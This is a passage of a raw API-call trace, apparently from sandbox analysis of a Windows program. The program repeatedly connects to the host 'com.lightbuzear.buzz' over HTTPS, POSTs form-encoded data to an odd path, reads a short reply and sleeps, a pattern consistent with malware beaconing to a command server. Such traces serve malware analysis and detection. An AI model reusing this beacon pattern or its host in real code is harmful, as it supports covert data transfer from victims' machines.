lpMem=0x482c8d0 | out: hHeap=0x4780000) returned 1 [0301.492] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0301.493] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb10 | out: hHeap=0x4780000) returned 1 [0301.493] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb78 [0301.493] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0301.493] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0301.493] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb78 | out: hHeap=0x4780000) returned 1 [0301.493] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eea38 [0301.493] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0301.493] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0301.493] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0301.493] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0301.494] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0301.494] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0302.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0302.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0302.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0302.585] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482caf8 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb10 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482caf8 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb10 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eec18 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0302.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec18 | out: hHeap=0x4780000) returned 1 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb50 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0302.586] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eee70 [0302.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0302.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0302.587] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0302.588] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0302.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eee70 | out: hHeap=0x4780000) returned 1 [0302.588] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0302.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0302.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0302.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0302.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0302.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0302.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0302.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0302.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c990 [0302.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb28 [0302.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c990 | out: hHeap=0x4780000) returned 1 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0302.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eedf8 [0302.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0302.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedf8 | out: hHeap=0x4780000) returned 1 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb78 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0302.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec18 [0302.620] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0302.621] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0302.621] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0302.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0302.622] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec18 | out: hHeap=0x4780000) returned 1 [0302.622] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0302.622] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0302.622] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0302.622] FreeLibrary (hLibModule=0x71570000) returned 1 [0302.622] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0302.622] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0302.623] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed08 | out: hHeap=0x4780000) returned 1 [0302.623] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0302.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec90 | out: hHeap=0x4780000) returned 1 [0302.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0302.624] Sleep (dwMilliseconds=0x2710) [0302.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0302.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0302.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0302.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0302.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0302.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0302.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0302.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0302.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0302.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c948 [0302.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0302.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca68 [0302.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c948 | out: hHeap=0x4780000) returned 1 [0302.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0302.639] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0302.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c9f0 [0302.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eedf8 [0302.639] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedf8 | out: hHeap=0x4780000) returned 1 [0302.639] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0302.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeda8 [0302.639] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0302.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c870 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca08 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c870 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca08 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eedf8 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0302.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedf8 | out: hHeap=0x4780000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec18 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0302.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0302.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0302.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0302.641] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0302.641] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0302.641] FreeLibrary (hLibModule=0x71780000) returned 1 [0302.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0302.642] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0302.642] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0302.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0302.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0302.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0302.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cb28 [0302.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482caf8 [0302.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0302.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0302.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482caf8 | out: hHeap=0x4780000) returned 1 [0302.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c918 [0302.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0302.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0302.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0302.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed08 [0302.643] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0302.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0302.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0302.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0302.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0302.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0302.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0302.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0302.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0302.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0302.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0302.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9a8 [0302.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0302.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb28 [0302.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0302.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0302.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0302.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c858 [0302.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eedf8 [0302.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedf8 | out: hHeap=0x4780000) returned 1 [0302.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0302.644] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cac8 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb10 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cac8 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb10 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eedf8 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0302.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedf8 | out: hHeap=0x4780000) returned 1 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec90 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0302.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eedf8 [0302.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0302.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0302.646] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0302.646] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedf8 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c870 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9d8 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c870 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9d8 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eedf8 [0302.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0302.648] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedf8 | out: hHeap=0x4780000) returned 1 [0302.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eedf8 [0302.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0302.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eee48 [0302.648] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0302.648] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0302.648] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0302.648] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0303.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eee48 | out: hHeap=0x4780000) returned 1 [0303.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0303.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0303.820] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0303.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0303.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0303.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0303.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0303.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0303.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0303.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0303.820] RtlAllocateHeap (HeapHandle=0x4780000, 